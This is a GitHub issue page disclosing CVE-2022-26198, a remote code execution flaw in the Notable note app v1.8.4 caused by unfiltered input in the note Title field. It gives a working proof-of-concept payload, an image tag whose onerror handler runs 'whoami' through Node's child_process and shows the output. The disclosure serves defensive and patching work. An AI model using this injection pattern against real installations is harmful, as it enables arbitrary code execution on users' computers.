Headline
CVE-2022-26198: RCE Vulnerability in Notable · Issue #1595 · notable/notable
Notable v1.8.4 does not filter text editing, allowing attackers to execute arbitrary code via a crafted payload injected into the Title text field.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Comments
author: AMao@Hillstone
Date: 2022-02-22
Text editing without filtering leads to arbitrary code execution
Payload:
<img src=# onerror="require('child_process').exec('whoami',(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});">
eg.
2 participants